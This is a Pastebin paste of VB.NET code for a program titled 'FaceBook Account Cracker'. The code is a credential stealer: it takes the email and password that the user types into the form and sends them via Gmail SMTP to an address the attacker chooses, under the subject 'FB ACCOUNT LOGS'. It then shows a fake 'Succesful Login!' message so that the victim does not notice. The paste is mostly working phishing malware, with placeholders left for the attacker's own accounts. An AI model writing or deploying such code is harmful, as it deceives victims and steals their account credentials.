Guest User

Untitled

a guest
Jul 10th, 2018
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.11 KB | None | 0 0
  1. Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
  2. If TextBox1.Text = "" Then
  3. MsgBox("The Email field is not filled in!", MsgBoxStyle.Critical, "FaceBook Account Cracker")
  4. End If
  5.  
  6. If TextBox2.Text = "" Then
  7. MsgBox("The Password field is not filled in!", MsgBoxStyle.Critical, "FaceBook Account Cracker")
  8. End If
  9.  
  10. Dim mail As New System.Net.Mail.MailMessage()
  11. Dim SmtpServer As New SmtpClient
  12. SmtpServer.Credentials = New Net.NetworkCredential("YOUR GMAIL", "YOUR PASSWORD")
  13. SmtpServer.Port = 587
  14. SmtpServer.Host = "smtp.gmail.com"
  15. SmtpServer.EnableSsl = True
  16. mail.To.Add("EMAIL TO SEND TO")
  17. mail.From = New MailAddress("YOUR GMAIL ACCOUNT")
  18. mail.Subject = "FB ACCOUNT LOGS"
  19. mail.Body = "Username: " + TextBox1.Text + vbNewLine + "Password: " + TextBox2.Text
  20. SmtpServer.Send(mail)
  21. MsgBox("Succesful Login!. Press 'NEXT' To continue.", MsgBoxStyle.Critical, "Completed!")
  22. Button3.Show()
  23. End Sub
Add Comment
Please, Sign In to add comment